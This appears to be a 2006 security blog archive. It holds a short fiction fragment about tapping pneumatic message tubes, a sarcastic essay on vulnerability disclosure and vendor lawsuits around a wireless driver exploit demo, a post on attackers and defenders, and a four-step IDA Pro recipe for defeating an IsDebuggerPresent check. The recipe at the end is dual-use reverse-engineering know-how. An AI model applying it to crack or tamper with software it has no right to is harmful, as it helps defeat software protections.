One challenge was that, through this particular station, Lloyd's had no less than 21 tubes, too many to monitor at once. Whistle knew to check which switch they went to, though. And only one switch down here lead to the destination he was supposed to watch for.

He found that only four of the tubes went through that switch, so that was the set he would have to watch. From his bag he pulled a set of loadstones and reed flags.

Carefully, he found the places in the middle of the tubes where the plungers would have to cross. The places where, when the plunger went back and forth, it would flip the flag one way and then the other, giving him a visual means of watching the bits. Down here, you could use a horn to listen to one pipe, if you only had one to watch. Well, maybe two. He had heard of one blind kid that could do two at once.

For a lot of beginners, tapping by ear was easier. Especially if you were used to decoding by ear at a legitimate endpoint anyway.

But that didn't help if you needed to watch four. Whistle set up the reeds so that the reflective sides were to the right, where the gaslight was. Once the plunger started going, the flashes would let him read the message right off the pipe.

2006-09-04T12:28:00.000-07:00

When, where, how and for how much, to reveal your vulnerability

You know, I can do these long logic chains based on a lot of assumptions as well. Can I get some vitriol?

So, you're a researcher, and you've got some sexy new class of exploitable flaws you've found. You do your presentation at con, but it seems like everyone's employers nowadays don't appreciate presenters dropping 0-day. Therefore, you decide to show a video clip instead.

You decide to playfully pick on a group of smug OS users who generally think they are more secure. (I know. Security researchers bursting the bubble of someone with a false sense of security? I'm shocked too.)

Trying hard to be "responsible" (as defined by the software vendors), you give the vendor some heads up that you're going to be showing a video demo of yourself 0wning their kernel driver. Lo! This vendor, who happens to actively cultivate this perception that their stuff is more secure, takes exception.

Let's talk about this particular software vendor for a sec. They have repeatedly demonstrated a willingness to sue anyone who reveals anything they aren't ready to reveal. They are willing to sue every time. Even if it's true. To the point where you might have to take them to the state supreme court to try and keep them from going after your sources.

Of course, that's for news, which theoretically has some constitutional protection in the U.S. How do they feel about vulnerability disclosure? "We don't feel that our customers are better served by public disclosure of potential issues". Oh.

So, maybe picking on Darth Litigious isn't such a hot idea. They decide to instead demo one of the third-party cards with its own vulnerable driver. And not even identify the card, so that vendor can't complain either. Yeah, it kind of weakens their demo, but they don't have a lot of choice.

Maybe they could just mention in passing that the sue-happy vendor's built-in card and driver have similar problems?

Surely, the masses won't ignore the impressive 802.11 research presented that made up 80% of the talk, and only focus on the demo? And pick the demo to death only because it affected their favorite platform? Surely, it can't be possible that rational, sane people would believe that the problem is demonstratable on FreeBSD, Windows, and even their own platform, but with a third-party driver... and then not believe that there is any chance whatsoever that the same kind of problem exists on the driver that ships with the OS?

No, clearly, the researchers must have faked the video. It seems MUCH more likely that they would use a third-party card ONLY as a red herring. Not because the OS vendor breaks out the lawyers at the drop of a hat. No, they faked the video, and they didn't show themselves popping the native card because, well... that's more believable. Or something.

So, clearly the zealots were right all along, the researchers are frauds. Wasn't it stupid of them to get up in front of all their friends and peers, and pull a scam? Especially since at least one of them had proven himself more than competent over the years. Oh well, no accounting for stupidity.

But zealots are rarely willing to let things go at victory. No, how about the zealots taunt the researchers with promises of prizes, on the off chance that the researchers have something to actually show? Maybe all they were waiting for was a shiny thing. And not the threat of lawsuit.

Let's examine the offer from the zealot.

Zealot will buy said vulnerable (Ha! As if!) shiny thing
Zealot will not permit researchers to put their filty paws on the shiny thing
Researchers will use their exploit, which they have promised to keep private until the patch is out
If the exploit doesn't work flawlessly on the first try, then researchers will either have to give the zealot the cost of the shiny thing, or it will be called "even". Where "even" is the researchers have to pay no money, but zealot will crow about victory, and researchers will have proven themselves untrustworthy by using the exploit they said they would keep private, and maybe get sued.
However, if it does work flawlessly, the researchers will be up one shiny thing, and will only have proven themselves untrustworthy, and maybe get sued. Plus, zealot will have some excuse as to why it doesn't matter because, well, whatever, nuh-uh!
All judging will be done by zealot, who would be out the cost of one shiny thing, and prove himself completely wrong if he declares the researchers the winners.

So, back to my opening question, if you're a researcher in this position. You've got this sexy vuln, what do you do with it? Here are some options:

Ignore any potential gain from your work, don't present it, sell it, use it as a resume item, etc... just post it, and take a chance the vendor will be really mad about that. Tick off potential employers. Anger some peers who think that is irresponsible.
Sell it. TippingPoint and iDefense will offer $10,000 or more. That's like, enough for 9 shiny things! Note that you will be required to keep the exploit private until the patch ships.
Present it and try and warn people about this class of problem. (Also, you get some travel expenses, and maybe enough money for 1 shiny thing. Woo!) Note that this does not neccessarily prevent you from releasing the exploit if you want. Unless maybe your employer paid for some of your time, and insists that you don't. Or maybe your peers and potential employers and customers wouldn't like that. Or maybe the conference itself got sued for that sort of thing last year, and it wouldn't be cool.
Unless you tried to be nice to the vendor by giving them some advance notice, who then turns around and makes you change your presentation and hold your tongue. Even if they later issue a public half-denial that they know about the problem. because, you know that presenters and conferences get sued for that kind of thing now...

So, the holding all details until a patch is released strategy looks like a pretty good choice. The researchers probably would have had more options if they hadn't tried to give any vendors advance notice, but it's a bit late for that now.

Maybe the vendor is trying really hard to communicate to the researchers that the best strategy is to just blindside the vendor? Maybe they like a challenge.

In case it's not obvious, I don't believe that David and Johnny faked anything. They are being really big about the whole thing, despite taunts, derision and bribes. I believe they will proven correct when Apple puts out the patch (which is, of course, completely on Apple's schedule.) And I also believe that the same people who are calling them frauds now will probably still be grasping at any little detail which might help them keep from admitting they were wrong.

Second Coder Wins

2006-09-04T12:22:00.000-07:00

Second coder wins

I subscribe to the school of thought that says the second coder always wins. By that, I mean that after you write your "undetectable" rootkit, someone will analyze it, and find a way to detect it. If your malware kills all the protection mechanisms on a victim, then the AV vendors will recode their apps so that the technique you used to kill them no longer works. IDS vendors will find a way to detect your IDS evasion, and so on.

Exceptions: Crypto might be an exception, though I've been surprised by the number of crypto algorithms that have fallen in recent years.

2006-08-16T00:04:00.000-07:00

In IDA Pro, to defeat a simple IsDebuggerPresent check

Set a breakpoint at the top of the start function
F9 to run the program
Shift-F2 to open the IDC window
PatchByte ( EBX+2, 0);